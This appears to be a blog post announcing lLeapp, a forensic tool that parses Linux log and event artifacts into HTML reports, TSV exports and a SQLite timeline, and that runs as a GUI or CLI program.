Meet The Newest Member of the xLeapp Family
The newest member of the xLeapp family is lLeapp, which stands for Linux Logs Events Application Program Parser. This program, like all the other xLeapp programs will process artifacts and report on those artifacts. Like all the other xLeapp programs it takes a zip/gzip/tgz or file system as input and will produce an html report as output.
In the initial version there are 37 artifacts that are parsed. Some of the artifacts will produce multiple reports. A partial list of artifacts parsed are below.
In the initial version you can run the programs using Python 3.9 or download the windows executable files in the Releases section. There are two (2) flavors of the program, a gui program or a cli program. The gui program main screen looks like this.
The only thing you need to provide is either a file or folder as input and an output directory. You can select the artifacts that you want to parse then process them. Once that is completed you can then open the html report of the parsed artifacts.
Along with the html report there is also tsv files for each report. They can be found in “_TSV Export” directory. In the temp directory you can find all the artifact files that were copied from the data source and processed. In the _Timeline directory there is a SQLite database that has timeline data in that you can create a super timeline with.
In the coming weeks I will plan on adding some more artifacts as well as creating a plugin for Autopsy so that Autopsy can process more Linux data. If anyone has any artifacts that they would like to see added please let me know. As always comments are always welcome.